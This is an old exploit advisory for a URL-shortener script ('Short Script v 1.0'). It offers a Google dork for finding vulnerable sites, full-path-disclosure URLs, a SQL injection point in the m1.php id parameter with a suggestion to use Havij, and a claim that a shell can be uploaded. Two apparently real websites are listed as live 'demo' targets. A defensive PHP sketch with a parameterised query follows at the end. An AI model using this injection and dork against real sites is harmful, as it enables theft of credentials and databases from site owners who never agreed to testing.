
URL Shortener SQL Injection Vulnerability

Author: Sd-cracker, Published: 04-02-2013
-------------------------------------------------------------------
URL Shortener SQL Injection Vulnerability
-------------------------------------------------------------------
# Vendor: Unknown
# Security Risk: High - SQL Injection
# Version: Short Script v 1.0 and every URL-shortener script that looks like the one in the picture
# Picture of the script: [http://img827.imageshack.us/img827/9343/74711944.jpg]
#####
# Author => Sd-cracker
# E-mail => sd-cracker[at]hotmail[dot]com
# Facebook => http://fb.me/sdcracker.hack
# Google Dork => 1# intext:"Short Script v 1.0"
#                2# you're a hacker, for God's sake
# Tested on: Windows 7, Backtrack 5r2
####

#=> Exploit Info :
------------------
# An attacker can access the database and retrieve usernames and passwords.

# Also, under some conditions [Magic Quotes ON], a shell can be uploaded via SQL injection.
------------------

#=> Exploit :
------------------
1#=> Full Path Disclosure :

http://[target]/[path]/m1.php?id=945

http://[target]/[path]/admin
-------
2#=> SQL Injection

[Inject with Havij or inject manually]

http://[target]/[path]/m1.php?id=945'[inj3ct h3re]
----
#Demo :
http://www.egcenter.com/m1.php?id=1033

http://short.109acu.info/m1.php?id=395536

--
#Greetz to: All Arab Hackers

------------------------------ <= Th3 End ^_^'
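
A defensive counterpart to the two findings above, added here as an example and not taken from the affected script: a handler for the `id` parameter that validates the value as an integer, binds it as a query parameter, and keeps error text out of the response. The `links` table, its columns, the function names and the in-memory SQLite database are assumptions made for this sketch.

```php
<?php
declare(strict_types=1);

// Added example; schema and names below are assumptions, not the script's own.
// Raw PHP/SQL error text in a response is what leaks the server file path,
// so errors are logged and never displayed.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

function open_db(): PDO
{
    // Constructed sample data in an in-memory SQLite database.
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE links (id INTEGER PRIMARY KEY, target TEXT NOT NULL)');
    $db->exec("INSERT INTO links (id, target) VALUES (945, 'https://example.com/landing')");
    return $db;
}

function resolve_link(PDO $db, string $rawId): ?string
{
    // 1. Allow-list: the value must parse as an integer >= 1, nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    try {
        // 2. Bound parameter: the value is never part of the SQL text.
        $stmt = $db->prepare('SELECT target FROM links WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $target = $stmt->fetchColumn();
        return $target === false ? null : (string) $target;
    } catch (PDOException $e) {
        // 3. Failure details go to the server log only; the caller sees null.
        error_log('link lookup failed: ' . $e->getMessage());
        return null;
    }
}

// Constructed inputs: a valid id, the quoted id from the advisory, and junk.
$db = open_db();
foreach (['945', "945'", 'abc', '-1', ''] as $raw) {
    $target = resolve_link($db, $raw);
    printf("%-10s => %s\n", var_export($raw, true), $target ?? '404 Not Found');
}
```

Every input other than a plain positive integer gets the same generic not-found result, so a malformed `id` produces neither a SQL error nor a file path in the response.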
